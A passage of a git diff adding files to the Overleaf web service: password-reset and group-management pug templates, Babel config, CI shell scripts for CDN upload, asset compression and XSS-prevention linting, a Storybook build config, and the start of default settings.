#{translate('request_new_password_reset_email')} + + input(type="hidden" name="_csrf" value=csrfToken) + input(type="text" hidden name="email" autocomplete="username" value=email) + + .form-group.mb-3 + label.form-label(for='passwordField', data-ol-hide-on-error-message="token-expired") #{translate("new_password")} + input.form-control.auth-aux-new-password#passwordField( + type='password' + name='password' + autocomplete="new-password" + autofocus + required + minlength=settings.passwordStrengthOptions.length.min + ) + + +customValidationMessageNewStyle('invalid-password') + | #{translate('invalid_password')}. + + +customValidationMessageNewStyle('password-must-be-different') + | #{translate('password_cant_be_the_same_as_current_one')}. + + +customValidationMessageNewStyle('password-must-be-strong') + | !{translate('password_was_detected_on_a_public_list_of_known_compromised_passwords', {}, [{name: 'a', attrs: {href: 'https://haveibeenpwned.com/passwords', rel: 'noopener noreferrer', target: '_blank'}}])}. + | #{translate('use_a_different_password')}. + + input( + type="hidden" + name="passwordResetToken" + value=passwordResetToken + ) + div(data-ol-hide-on-error-message="token-expired") + div #{translate('in_order_to_have_a_secure_account_make_sure_your_password')} + ul.mb-3.ps-4 + li #{translate('is_longer_than_n_characters', {n: settings.passwordStrengthOptions.length.min})} + li #{translate('does_not_contain_or_significantly_match_your_email')} + li #{translate('is_not_used_on_any_other_website')} + .actions + button.btn.btn-primary.w-100( + type='submit' + data-ol-disabled-inflight + aria-label=translate('set_new_password') + ) + span(data-ol-inflight="idle") + | #{translate('set_new_password')} + span(hidden data-ol-inflight="pending") + | #{translate('set_new_password')}… diff --git a/services/web/app/views/user/setPassword.pug b/services/web/app/views/user/setPassword.pug new file mode 100644 index 0000000..5da2b6b --- /dev/null +++ b/services/web/app/views/user/setPassword.pug @@ -0,0 +1,89 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container-custom-sm.mx-auto + .card + form( + data-ol-async-form, + name="passwordResetForm", + action="/user/password/set", + method="POST", + data-ol-hide-on-error="token-expired" + ) + div( + hidden + data-ol-sent + ) + h3.mt-0.mb-2 #{translate("password_updated")} + p.mb-4 #{translate("your_password_has_been_successfully_changed")}. + a(href='/login') #{translate("log_in_now")} + + div(data-ol-not-sent) + h3.mt-0.mb-2 #{translate("reset_your_password")} + p(data-ol-hide-on-error-message="token-expired") #{translate("create_a_new_password_for_your_account")}. + +formMessages() + + +customFormMessage('password-contains-email', 'danger') + | #{translate('invalid_password_contains_email')}. + | #{translate('use_a_different_password')}. + + +customFormMessage('password-too-similar', 'danger') + | #{translate('invalid_password_too_similar')}. + | #{translate('use_a_different_password')}. + + +customFormMessage('token-expired', 'danger') + | #{translate('password_reset_token_expired')} + br + a(href="/user/password/reset") + | #{translate('request_new_password_reset_email')} + + input(type="hidden", name="_csrf", value=csrfToken) + input(type="text" hidden name="email" autocomplete="username" value=email) + + .form-group + label(for='passwordField', data-ol-hide-on-error-message="token-expired") #{translate("new_password")} + input.form-control#passwordField( + type='password', + name='password', + placeholder=translate("enter_your_new_password"), + autocomplete="new-password", + autofocus, + required, + minlength=settings.passwordStrengthOptions.length.min + ) + + +customValidationMessage('invalid-password') + | #{translate('invalid_password')}. + + +customValidationMessage('password-must-be-different') + | #{translate('password_cant_be_the_same_as_current_one')}. + + +customValidationMessage('password-must-be-strong') + | !{translate('password_was_detected_on_a_public_list_of_known_compromised_passwords', {}, [{name: 'a', attrs: {href: 'https://haveibeenpwned.com/passwords', rel: 'noopener noreferrer', target: '_blank'}}])}. + | #{translate('use_a_different_password')}. + + input( + type="hidden", + name="passwordResetToken", + value=passwordResetToken + ) + div(data-ol-hide-on-error-message="token-expired") + div #{translate('in_order_to_have_a_secure_account_make_sure_your_password')} + ul.mb-4.ps-4 + li #{translate('is_longer_than_n_characters', {n: settings.passwordStrengthOptions.length.min})} + li #{translate('does_not_contain_or_significantly_match_your_email')} + li #{translate('is_not_used_on_any_other_website')} + .actions + button.btn.btn-primary.w-100( + type='submit', + data-ol-disabled-inflight + aria-label=translate('set_new_password') + ) + span(data-ol-inflight="idle") + | #{translate('set_new_password')} + span(hidden data-ol-inflight="pending") + | #{translate('set_new_password')}… diff --git a/services/web/app/views/user/settings.pug b/services/web/app/views/user/settings.pug new file mode 100644 index 0000000..4f939a4 --- /dev/null +++ b/services/web/app/views/user/settings.pug @@ -0,0 +1,38 @@ +extends ../layout-react + +block entrypointVar + - entrypoint = 'pages/user/settings' + +block vars + - isWebsiteRedesign = true + +block append meta + meta(name="ol-hasPassword" data-type="boolean" content=hasPassword) + meta(name="ol-shouldAllowEditingDetails" data-type="boolean" content=shouldAllowEditingDetails) + meta(name="ol-oauthProviders", data-type="json", content=oauthProviders) + meta(name="ol-institutionLinked", data-type="json", content=institutionLinked) + meta(name="ol-samlError", data-type="json", content=samlError) + meta(name="ol-institutionEmailNonCanonical", content=institutionEmailNonCanonical) + + meta(name="ol-reconfirmedViaSAML", content=reconfirmedViaSAML) + meta(name="ol-reconfirmationRemoveEmail", content=reconfirmationRemoveEmail) + meta(name="ol-samlBeta", content=samlBeta) + meta(name="ol-ssoErrorMessage", content=ssoErrorMessage) + meta(name="ol-thirdPartyIds", data-type="json", content=thirdPartyIds || {}) + meta(name="ol-passwordStrengthOptions", data-type="json", content=settings.passwordStrengthOptions || {}) + meta(name="ol-isExternalAuthenticationSystemUsed" data-type="boolean" content=externalAuthenticationSystemUsed()) + meta(name="ol-user" data-type="json" content=user) + meta(name="ol-labsExperiments" data-type="json" content=labsExperiments) + meta(name="ol-dropbox" data-type="json" content=dropbox) + meta(name="ol-github" data-type="json" content=github) + meta(name="ol-projectSyncSuccessMessage", content=projectSyncSuccessMessage) + meta(name="ol-personalAccessTokens", data-type="json" content=personalAccessTokens) + meta(name="ol-emailAddressLimit", data-type="json", content=emailAddressLimit) + meta(name="ol-currentManagedUserAdminEmail" data-type="string" content=currentManagedUserAdminEmail) + meta(name="ol-gitBridgeEnabled" data-type="boolean" content=gitBridgeEnabled) + meta(name="ol-isSaas" data-type="boolean" content=isSaas) + meta(name="ol-memberOfSSOEnabledGroups" data-type="json" content=memberOfSSOEnabledGroups) + +block content + main.content.content-alt#main-content + #settings-page-root diff --git a/services/web/app/views/user_membership/group-managers-react.pug b/services/web/app/views/user_membership/group-managers-react.pug new file mode 100644 index 0000000..f4d8c0e --- /dev/null +++ b/services/web/app/views/user_membership/group-managers-react.pug @@ -0,0 +1,12 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-management/group-managers' + +block append meta + meta(name="ol-users", data-type="json", content=users) + meta(name="ol-groupId", data-type="string", content=groupId) + meta(name="ol-groupName", data-type="string", content=name) + +block content + main.content.content-alt#subscription-manage-group-root diff --git a/services/web/app/views/user_membership/group-members-react.pug b/services/web/app/views/user_membership/group-members-react.pug new file mode 100644 index 0000000..314a332 --- /dev/null +++ b/services/web/app/views/user_membership/group-members-react.pug @@ -0,0 +1,17 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-management/group-members' + +block append meta + meta(name="ol-users", data-type="json", content=users) + meta(name="ol-groupId", data-type="string", content=groupId) + meta(name="ol-groupName", data-type="string", content=name) + meta(name="ol-groupSize", data-type="json", content=groupSize) + meta(name="ol-managedUsersActive", data-type="boolean", content=managedUsersActive) + meta(name="ol-groupSSOActive", data-type="boolean", content=groupSSOActive) + meta(name="ol-canUseFlexibleLicensing", data-type="boolean", content=canUseFlexibleLicensing) + meta(name="ol-canUseAddSeatsFeature", data-type="boolean", content=canUseAddSeatsFeature) + +block content + main.content.content-alt#subscription-manage-group-root diff --git a/services/web/app/views/user_membership/institution-managers-react.pug b/services/web/app/views/user_membership/institution-managers-react.pug new file mode 100644 index 0000000..690e840 --- /dev/null +++ b/services/web/app/views/user_membership/institution-managers-react.pug @@ -0,0 +1,12 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-management/institution-managers' + +block append meta + meta(name="ol-users", data-type="json", content=users) + meta(name="ol-groupId", data-type="string", content=groupId) + meta(name="ol-groupName", data-type="string", content=name) + +block content + main.content.content-alt#subscription-manage-group-root diff --git a/services/web/app/views/user_membership/new.pug b/services/web/app/views/user_membership/new.pug new file mode 100644 index 0000000..6a88249 --- /dev/null +++ b/services/web/app/views/user_membership/new.pug @@ -0,0 +1,23 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container + .row + .col-md-10.col-md-offset-1 + h3 #{entityName} "#{entityId}" does not exists in v2 + form( + data-ol-regular-form + method='post', + action='' + ) + input(name="_csrf", type="hidden", value=csrfToken) + button.btn.btn-primary.text-capitalize( + type="submit", + data-ol-disabled-inflight + ) + span(data-ol-inflight="idle") Create #{entityName} in v2 + span(hidden data-ol-inflight="pending") #{translate("creating")}… diff --git a/services/web/app/views/user_membership/publisher-managers-react.pug b/services/web/app/views/user_membership/publisher-managers-react.pug new file mode 100644 index 0000000..793bdf9 --- /dev/null +++ b/services/web/app/views/user_membership/publisher-managers-react.pug @@ -0,0 +1,12 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-management/publisher-managers' + +block append meta + meta(name="ol-users", data-type="json", content=users) + meta(name="ol-groupId", data-type="string", content=groupId) + meta(name="ol-groupName", data-type="string", content=name) + +block content + main.content.content-alt#subscription-manage-group-root diff --git a/services/web/babel.config.json b/services/web/babel.config.json new file mode 100644 index 0000000..9bb4c73 --- /dev/null +++ b/services/web/babel.config.json @@ -0,0 +1,43 @@ +{ + "compact": false, + "presets": [ + [ + "@babel/env", + { + "useBuiltIns": "usage", + // This version must be aligned with the `core-js` version in `package.json` + "corejs": { "version": "3.38" }, + "exclude": [ + // Exclude Array.prototype.push polyfill, as it's not needed and affects performance in Chrome + "es.array.push", + // Exclude objectSpread polyfill, as it's not needed and affects performance + "@babel/plugin-transform-object-rest-spread", + // Exclude _defineProperty polyfill, as it causes a bug without the objectSpread polyfill + "@babel/plugin-transform-computed-properties", + // Use native async functions, for performance + "@babel/plugin-transform-async-to-generator", + // Use native generators, for performance + "@babel/plugin-transform-regenerator", + // Use native async generators, for performance + "@babel/plugin-transform-async-generator-functions", + // Use native for-of loops, for performance + "@babel/plugin-transform-for-of" + ] + } + ], + ["@babel/react", { "runtime": "automatic" }], + "@babel/typescript" + ], + "plugins": ["macros"], + "overrides": [ + // treat .cjs files (e.g. libraries symlinked into node_modules) as commonjs + { + "test": "../../**/*.cjs", + "sourceType": "script" + }, + { + "test": "../../libraries/overleaf-editor-core/**/*.js", + "sourceType": "script" + } + ] +} diff --git a/services/web/bin/cdn_upload b/services/web/bin/cdn_upload new file mode 100755 index 0000000..52281e4 --- /dev/null +++ b/services/web/bin/cdn_upload @@ -0,0 +1,73 @@ +#!/bin/bash +set -eEu + +function upload_into_bucket() { + bucket=$1 + + # stylesheets + bin/cdn_upload_batch 'text/css' "$bucket" '.css' \ + -x '.+(?<!\.css)$' & + + # javascript files + bin/cdn_upload_batch 'application/javascript' "$bucket" '.js' \ + -x '.+(?<!\.js)$' & + + # the rest + bin/cdn_upload_batch '-' "$bucket" '-' \ + -x '.+\.(css|js)$' & + + wait +} + +verify_upload_into_bucket() { + local bucket + local missing_from_bucket + bucket=$1 + printf '\nINFO: Verifying file availability in %s.\n' "$bucket" + readarray -t missing_from_bucket < <( + comm -13 \ + <(gsutil ls "${bucket}/public/**" | sed "s@${bucket}/@@" | sort) \ + <(find /tmp/public /tmp/compressed -type f | sed ' + # Remove absolute path prefix + s@^/tmp/@@; + # Undo the compressed/ directory separation that does not exist in the bucket + s@^compressed/@@ + ' | sort) + ) + if [[ ${#missing_from_bucket[@]} -eq 0 ]]; then + printf 'INFO: Verification successful: all local files have been found in bucket %s.\n' \ + "$bucket" + else + printf >&2 'WARN: %d local file(s) not available in bucket %s:\n' \ + ${#missing_from_bucket[@]} "$bucket" + printf >&2 ' - %s\n' "${missing_from_bucket[@]}" + return 1 + fi +} + +# Upload to staging CDN if branch is either 'main' or 'staging-main' +if [[ "$BRANCH_NAME" == "main" ]] || [[ "$BRANCH_NAME" == "staging-main" ]]; then + tar --directory=/tmp/ -xf build.tar + + # delete source maps + find /tmp/public -name '*.js.map' -delete + + bin/compress_assets + + upload_into_bucket "$CDN_STAG" && + verify_upload_into_bucket "$CDN_STAG" || exit 3 & + pid_staging=$! # record pid of the detached process "upload && verify || exit 3") + + pid_production= + # Only upload to production CDN if branch is + if [[ "$BRANCH_NAME" == "main" ]]; then + upload_into_bucket "$CDN_PROD" && + verify_upload_into_bucket "$CDN_PROD" || exit 4 & + pid_production=$! # record pid of the detached process "upload && verify || exit 4") + fi + + wait "$pid_staging" # wait for staging upload to finish, wait(1) will exit if the upload failed + if [[ -n "$pid_production" ]]; then + wait "$pid_production" # wait for production upload to finish (if started), wait(1) will exit if the upload failed + fi +fi diff --git a/services/web/bin/cdn_upload_batch b/services/web/bin/cdn_upload_batch new file mode 100755 index 0000000..606e2a9 --- /dev/null +++ b/services/web/bin/cdn_upload_batch @@ -0,0 +1,47 @@ +#!/bin/bash +set -e + +content_type=$1 +bucket=$2 +text_extension=$3 +shift 3 +content_type_options="" +if [[ "$content_type" != "-" ]]; then + content_type_options="-h Content-Type:${content_type};charset=utf-8" +fi + +# DOCS for gsutil -- it does not have long command line flags! +## global flags +# -h NAME:VALUE add header, can occur multiples times +# -m upload with multiple threads +## rsync flags +# -c use checksums for determining changed files (mtime is not stable) +# -r traverse into directories recursively +# -x Python regex for excluding files from the sync +if [[ "$text_extension" == "-" || $(find /tmp/public -type f -name "*$text_extension" | wc -l) != "0" ]]; then + # Potentially skip upload of non-compressed .js/.css files. + # shellcheck disable=SC2086 + gsutil \ + -h "Cache-Control:public, max-age=31536000" \ + ${content_type_options} \ + -m \ + rsync \ + -c \ + -r \ + "$@" \ + "/tmp/public/" \ + "${bucket}/public/" +fi + +# shellcheck disable=SC2086 +gsutil \ + -h "Cache-Control:public, max-age=31536000" \ + -h "Content-Encoding:gzip" \ + ${content_type_options} \ + -m \ + rsync \ + -c \ + -r \ + "$@" \ + "/tmp/compressed/public/" \ + "${bucket}/public/" diff --git a/services/web/bin/check_extracted_translations b/services/web/bin/check_extracted_translations new file mode 100755 index 0000000..569af5c --- /dev/null +++ b/services/web/bin/check_extracted_translations @@ -0,0 +1,24 @@ +#!/bin/bash + +set -e + +# Ensure all locales used in the frontend are tracked +OUTPUT=data/dumpFolder/i18next-scanner +trap 'rm -rf "$OUTPUT"' EXIT +npx i18next-scanner --output "$OUTPUT" +ACTUAL=frontend/extracted-translations.json +EXPECTED="$OUTPUT/frontend/extracted-translations.json" +if ! diff "$ACTUAL" "$EXPECTED"; then + cat <<MSG >&2 + +services/web/frontend/extracted-translations.json is not up-to-date. + +--- +Try running: + + internal$ bin/run web npm run extract-translations + +--- +MSG + exit 1 +fi diff --git a/services/web/bin/compress_assets b/services/web/bin/compress_assets new file mode 100755 index 0000000..e50f0a3 --- /dev/null +++ b/services/web/bin/compress_assets @@ -0,0 +1,14 @@ +#!/usr/bin/env bash +set -e -o pipefail + +SCRIPT_PATH=$(realpath "${BASH_SOURCE[0]}") +SCRIPT_DIR=$(dirname "$SCRIPT_PATH") + +pushd /tmp + +find public/ -type d | sed 's!^!compressed/!' | xargs mkdir --parents + +find public/ -type f -print0 \ +| xargs --null --max-args 20 --max-procs 10 "$SCRIPT_DIR/compress_batch_of_assets" + +popd diff --git a/services/web/bin/compress_batch_of_assets b/services/web/bin/compress_batch_of_assets new file mode 100755 index 0000000..4a650da --- /dev/null +++ b/services/web/bin/compress_batch_of_assets @@ -0,0 +1,16 @@ +#!/usr/bin/env bash +set -e + +for file in "$@"; do + file_gzipped="compressed/$file" + + gzip -9 --no-name --stdout "$file" > "$file_gzipped" + + before=$(stat -c%s "$file") + after=$(stat -c%s "$file_gzipped") + if [[ "$after" -ge "$before" ]]; then + rm "$file_gzipped" + else + rm "$file" + fi +done diff --git a/services/web/bin/copy_external_pages b/services/web/bin/copy_external_pages new file mode 100755 index 0000000..c025379 --- /dev/null +++ b/services/web/bin/copy_external_pages @@ -0,0 +1,6 @@ +#!/bin/bash +set -e + +# Branding +mv app/views/external/robots.txt public/robots.txt +mv app/views/external/googlebdb0f8f7f4a17241.html public/googlebdb0f8f7f4a17241.html diff --git a/services/web/bin/lint_flag_res_send_usage b/services/web/bin/lint_flag_res_send_usage new file mode 100755 index 0000000..9931071 --- /dev/null +++ b/services/web/bin/lint_flag_res_send_usage @@ -0,0 +1,47 @@ +#!/bin/bash + +set -e + +POTENTIAL_SEND_USAGE=$(\ + grep \ + --files-with-matches \ + --recursive \ + app.mjs \ + app/ \ + modules/*/app \ + test/acceptance/ \ + modules/*/test/acceptance/ \ + --regex "\.send\b" \ + --regex "\bsend(" \ +) +HELPER_MODULE="app/src/infrastructure/Response.js" +if [[ "$POTENTIAL_SEND_USAGE" == "$HELPER_MODULE" ]]; then + exit 0 +fi + +for file in ${POTENTIAL_SEND_USAGE}; do + if [[ "$file" == "$HELPER_MODULE" ]]; then + continue + fi + + cat <<MSG >&2 + +ERROR: $file contains a potential use of 'res.send'. + +--- +$(grep -n -C 3 "$file" --regex "\.send\b" --regex "\bsend(") +--- + +Using 'res.send' is prone to introducing XSS vulnerabilities. + +Consider using 'res.json' or one of the helpers in $HELPER_MODULE. + +If this is a false-positive, consider using a more specific name than 'send' + for your newly introduced function. + +Links: + - https://github.com/overleaf/internal/issues/6268 + +MSG + exit 1 +done diff --git a/services/web/bin/lint_locales b/services/web/bin/lint_locales new file mode 100755 index 0000000..eceefe0 --- /dev/null +++ b/services/web/bin/lint_locales @@ -0,0 +1,43 @@ +#!/bin/bash + +set -e + +# Ensure all locale files are sorted. +node scripts/translations/sort.js --check + +# Ensure all locales are still in use +node scripts/translations/cleanupUnusedLocales.js --check + +# Ensure all locales use the same variables +node scripts/translations/checkVariables.js --ignore-orphaned-translations + +# Ensure no locales contain single quotes. +LOCALES_WITH_SINGLE_QUOTE=$(\ + grep \ + --files-with-matches \ + --recursive locales/ \ + --regex "'" \ + || true +) + +for file in ${LOCALES_WITH_SINGLE_QUOTE}; do + cat <<MSG >&2 + +ERROR: $file contains a locale with a single quote. + +--- +$(grep "$file" --regex "'") +--- + +Using single quotes in locales can lead to Angular XSS. + +You will need to replace the quote with a similar looking character. +’ (\u2019) is a good candidate. + +Links: + - https://en.wikipedia.org/wiki/Right_single_quotation_mark + - https://github.com/overleaf/issues/issues/4478 + +MSG + exit 1 +done diff --git a/services/web/bin/lint_pug_templates b/services/web/bin/lint_pug_templates new file mode 100755 index 0000000..6f255d9 --- /dev/null +++ b/services/web/bin/lint_pug_templates @@ -0,0 +1,31 @@ +#!/bin/sh + +set -e + +TEMPLATES_EXTENDING_META_BLOCK=$(\ + grep \ + --files-with-matches \ + --recursive app/views modules/*/app/views \ + --regex 'block append meta' \ + --regex 'block prepend meta' \ + --regex 'append meta' \ + --regex 'prepend meta' \ +) + +for file in ${TEMPLATES_EXTENDING_META_BLOCK}; do + if ! grep "$file" --quiet --extended-regexp -e 'extends .+layout'; then + cat <<MSG >&2 + +ERROR: $file is a partial template and extends 'block meta'. + +Using block append/prepend in a partial will duplicate the block contents into + the <body> due to a bug in pug. +Putting meta tags in the <body> can lead to Angular XSS. + +You will need to refactor the partial and move the block into the top level + page template that extends the global layout.pug. + +MSG + exit 1 + fi +done diff --git a/services/web/bin/push-translations-changes.sh b/services/web/bin/push-translations-changes.sh new file mode 100755 index 0000000..ba24757 --- /dev/null +++ b/services/web/bin/push-translations-changes.sh @@ -0,0 +1,18 @@ +#!/bin/bash +set -e + +SCRIPT_PATH=$(realpath "${BASH_SOURCE[0]}") +SCRIPT_DIR=$(dirname "$SCRIPT_PATH") +WEB_DIR=$(dirname "$SCRIPT_DIR") + +cd "$WEB_DIR" + +if [[ $(git status --porcelain=2 locales/) ]]; then + git add locales/* + git commit -m "auto update translation" + # Switch the cloudbuild clone from https to ssh authentication. + git remote set-url --push origin git@github.com:overleaf/internal.git + git push origin "HEAD:$BRANCH_NAME" +else + echo 'No changes' +fi diff --git a/services/web/bin/routes b/services/web/bin/routes new file mode 100755 index 0000000..707a5da --- /dev/null +++ b/services/web/bin/routes @@ -0,0 +1,134 @@ +#! /usr/bin/env node + +const acorn = require('acorn') +const acornWalk = require('acorn-walk') +const fs = require('fs') +const _ = require('lodash') +const glob = require('glob') +const escodegen = require('escodegen') +const print = console.log + +const Methods = new Set([ + 'get', + 'head', + 'post', + 'put', + 'delete', + 'connect', + 'options', + 'trace', + 'patch', +]) + +const isMethod = str => { + return Methods.has(str) +} + +// Check if the expression is a call on a router, return data about it, or null +const routerCall = callExpression => { + const callee = callExpression.callee + const property = callee.property + const args = callExpression.arguments + if (!callee.object || !callee.object.name) { + return false + } + const routerName = callee.object.name + if ( + // Match known names for the Express routers: app, webRouter, whateverRouter, etc... + isMethod(property.name) && + (routerName === 'app' || routerName.match('^.*[rR]outer$')) + ) { + return { + routerName, + method: property.name, + args, + } + } else { + return null + } +} + +const formatMethodCall = expression => { + return escodegen.generate(expression, { format: { compact: true } }) +} + +const parseAndPrintRoutesSync = path => { + const content = fs.readFileSync(path) + // Walk the AST (Abstract Syntax Tree) + acornWalk.simple( + acorn.parse(content, { sourceType: 'module', ecmaVersion: 2020 }), + { + // We only care about call expression ( like `a.b()` ) + CallExpression(node) { + const call = routerCall(node) + if (call) { + const firstArg = _.first(call.args) + try { + print( + ` ${formatRouterName(call.routerName)}\t .${call.method} \t: ${ + firstArg.value + } => ${call.args.slice(1).map(formatMethodCall).join(' => ')}` + ) + } catch (e) { + print('>> Error') + print(e) + print(JSON.stringify(call)) + process.exit(1) + } + } + }, + } + ) +} + +const routerNameMapping = { + privateApiRouter: 'privateApi', + publicApiRouter: 'publicApi', +} +const formatRouterName = name => { + return routerNameMapping[name] || name +} + +const main = () => { + // Take an optional filter to apply to file names + const filter = process.argv[2] || null + + if (filter && (filter === '--help' || filter === 'help')) { + print('') + print(' Usage: bin/routes [filter]') + print(' Examples:') + print(' bin/routes') + print(' bin/routes GitBridge') + print('') + process.exit(0) + } + + // Find all routers + glob('*[rR]outer.*js', { matchBase: true }, (err, files) => { + if (err) { + console.error(err) + process.exit(1) + } + for (const file of files) { + if (file.match('^node_modules.*$') || file.match('.*/public/.*')) { + continue + } + // Restrict to the filter (if filter is present) + if (filter && !file.match(`.*${filter}.*`)) { + continue + } + print(`[${file}]`) + try { + parseAndPrintRoutesSync(file) + } catch (_e) { + print('>> Error parsing file') + continue + } + } + process.exit(0) + }) +} + +if (require.main === module) { + main() +} diff --git a/services/web/bin/run b/services/web/bin/run new file mode 100755 index 0000000..f0af921 --- /dev/null +++ b/services/web/bin/run @@ -0,0 +1,8 @@ +#!/bin/bash + +pushd .. +bin/run "$*" +RV=$? +popd || exit 1 + +exit $RV diff --git a/services/web/bin/sentry_upload b/services/web/bin/sentry_upload new file mode 100755 index 0000000..ad19a6c --- /dev/null +++ b/services/web/bin/sentry_upload @@ -0,0 +1,18 @@ +#!/bin/sh +set -e + +if [[ "$BRANCH_NAME" == "master" || "$BRANCH_NAME" == "main" ]]; then + rm -rf sentry_upload + mkdir sentry_upload + tar --directory sentry_upload -xf build.tar + cd sentry_upload/public + + SENTRY_RELEASE=${COMMIT_SHA} + sentry-cli releases new "$SENTRY_RELEASE" + sentry-cli releases set-commits --auto "$SENTRY_RELEASE" + sentry-cli sourcemaps upload --release="$SENTRY_RELEASE" . + sentry-cli releases finalize "$SENTRY_RELEASE" + + cd ../.. + rm -rf sentry_upload +fi diff --git a/services/web/cloudbuild-storybook-index.html.m4 b/services/web/cloudbuild-storybook-index.html.m4 new file mode 100644 index 0000000..b7845c3 --- /dev/null +++ b/services/web/cloudbuild-storybook-index.html.m4 @@ -0,0 +1,78 @@ +divert(`-1') +define(`foreach', `pushdef(`$1')_foreach($@)popdef(`$1')') +define(`_arg1', `$1') +define(`_foreach', `ifelse(`$2', `()', `', + `define(`$1', _arg1$2)$3`'$0(`$1', (shift$2), `$3')')') +divert`'dnl +<html lang="en"> + <head> + <meta charset="utf-8"> + <title>Overleaf Storybook builds + + + + +

    Overleaf Storybook builds

    +

    Branches:

    +
      + foreach(DIR, (LIST), +
    • + DIR/ + + GitHub + +
    • + ) +
    + + Last updated on syscmd(date)dnl + for ifdef(`BRANCH_NAME',BRANCH_NAME,unknown branch) + (build history). + + + diff --git a/services/web/cloudbuild-storybook.yaml b/services/web/cloudbuild-storybook.yaml new file mode 100644 index 0000000..ac9cfeb --- /dev/null +++ b/services/web/cloudbuild-storybook.yaml @@ -0,0 +1,70 @@ +steps: + - id: npm_ci + name: "node:20.18.2" + entrypoint: /bin/bash + args: + - '-c' + - 'bin/npm_install_subset . libraries/* services/web' + + - id: build-storybook + name: 'node:20.18.2' + env: + - 'BRANCH_NAME=$BRANCH_NAME' + - 'BUILD_ID=$BUILD_ID' + script: | + #!/bin/bash + set -e + make -C services/web BRANCH_NAME="${BRANCH_NAME:-$BUILD_ID}" build_storybook + + - id: deploy-storybook + name: 'gcr.io/google.com/cloudsdktool/cloud-sdk' + env: + - 'BRANCH_NAME=$BRANCH_NAME' + - 'BUILD_ID=$BUILD_ID' + - 'BUCKET=gs://overleaf-dev-storybook' + dir: services/web + script: | + #!/bin/bash + : ${BRANCH_NAME:=$BUILD_ID} + [[ "$BRANCH_NAME" ]] || { + echo 1>&2 "ERROR: BRANCH_NAME not set" + exit 2 + } + gsutil -m copy -r storybook-output/* "${BUCKET}/" + waitFor: + - build-storybook + + - id: read-storybook-bucket + name: 'gcr.io/google.com/cloudsdktool/cloud-sdk' + dir: services/web + env: + - 'BUCKET=gs://overleaf-dev-storybook' + script: | + #!/bin/bash + set -ex + gsutil ls "${BUCKET}/" \ + | sed -E "s@^${BUCKET}/([^/]+)/@\1@" \ + > storybook-bucket-listing.txt + waitFor: + - deploy-storybook + + - id: create-storybook-index + name: 'node:20.18.2' + dir: services/web + env: + - 'BRANCH_NAME=$BRANCH_NAME' + script: | + #!/bin/bash + set -ex + LIST=$(tr '\n' , < storybook-bucket-listing.txt) + m4 -DLIST="$LIST" -DBRANCH_NAME="$BRANCH_NAME" cloudbuild-storybook-index.html.m4 > storybook-index.html + waitFor: + - read-storybook-bucket + + - id: update-storybook-index + name: 'gcr.io/google.com/cloudsdktool/cloud-sdk' + dir: services/web + entrypoint: 'gsutil' + args: [ "copy", "storybook-index.html", "gs://overleaf-dev-storybook/index.html" ] + waitFor: + - create-storybook-index diff --git a/services/web/config/settings.defaults.js b/services/web/config/settings.defaults.js new file mode 100644 index 0000000..be567bf --- /dev/null +++ b/services/web/config/settings.defaults.js @@ -0,0 +1,1037 @@ +const Path = require('path') +const { merge } = require('@overleaf/settings/merge') + +let defaultFeatures, siteUrl + +// Make time interval config easier. +const seconds = 1000 +const minutes = 60 * seconds + +// These credentials are used for authenticating api requests +// between services that may need to go over public channels +const httpAuthUser = process.env.WEB_API_USER +const httpAuthPass = process.env.WEB_API_PASSWORD +const httpAuthUsers = {} +if (httpAuthUser && httpAuthPass) { + httpAuthUsers[httpAuthUser] = httpAuthPass +} + +const intFromEnv = function (name, defaultValue) { + if ( + [null, undefined].includes(defaultValue) || + typeof defaultValue !== 'number' + ) { + throw new Error( + `Bad default integer value for setting: ${name}, ${defaultValue}` + ) + } + return parseInt(process.env[name], 10) || defaultValue +} + +const defaultTextExtensions = [ + 'tex', + 'latex', + 'sty', + 'cls', + 'bst', + 'bib', + 'bibtex', + 'txt', + 'tikz', + 'mtx', + 'rtex', + 'md', + 'asy', + 'lbx', + 'bbx', + 'cbx', + 'm', + 'lco', + 'dtx', + 'ins', + 'ist', + 'def', + 'clo', + 'ldf', + 'rmd', + 'lua', + 'gv', + 'mf', + 'yml', + 'yaml', + 'lhs', + 'mk', + 'xmpdata', + 'cfg', + 'rnw', + 'ltx', + 'inc', +] + +const parseTextExtensions = function (extensions) { + if (extensions) { + return extensions.split(',').map(ext => ext.trim()) + } else { + return [] + } +} + +const httpPermissionsPolicy = { + blocked: [ + 'accelerometer', + 'attribution-reporting', + 'browsing-topics', + 'camera', + 'display-capture', + 'encrypted-media', + 'gamepad', + 'geolocation', + 'gyroscope', + 'hid', + 'identity-credentials-get', + 'idle-detection', + 'local-fonts', + 'magnetometer', + 'microphone', + 'midi', + 'otp-credentials', + 'payment', + 'picture-in-picture', + 'screen-wake-lock', + 'serial', + 'storage-access', + 'usb', + 'window-management', + 'xr-spatial-tracking', + ], + allowed: { + autoplay: 'self "https://videos.ctfassets.net"', + fullscreen: 'self', + }, +} + +module.exports = { + env: 'server-ce', + + limits: { + httpGlobalAgentMaxSockets: 300, + httpsGlobalAgentMaxSockets: 300, + }, + + allowAnonymousReadAndWriteSharing: + process.env.OVERLEAF_ALLOW_ANONYMOUS_READ_AND_WRITE_SHARING === 'true', + + // Databases + // --------- + mongo: { + options: { + appname: 'web', + maxPoolSize: parseInt(process.env.MONGO_POOL_SIZE, 10) || 100, + serverSelectionTimeoutMS: + parseInt(process.env.MONGO_SERVER_SELECTION_TIMEOUT, 10) || 60000, + // Setting socketTimeoutMS to 0 means no timeout + socketTimeoutMS: parseInt( + process.env.MONGO_SOCKET_TIMEOUT ?? '60000', + 10 + ), + monitorCommands: true, + }, + url: + process.env.MONGO_CONNECTION_STRING || + process.env.MONGO_URL || + `mongodb://${process.env.MONGO_HOST || '127.0.0.1'}/sharelatex`, + hasSecondaries: process.env.MONGO_HAS_SECONDARIES === 'true', + }, + + redis: { + web: { + host: process.env.REDIS_HOST || '127.0.0.1', + port: process.env.REDIS_PORT || '6379', + password: process.env.REDIS_PASSWORD || '', + db: process.env.REDIS_DB, + maxRetriesPerRequest: parseInt( + process.env.REDIS_MAX_RETRIES_PER_REQUEST || '20' + ), 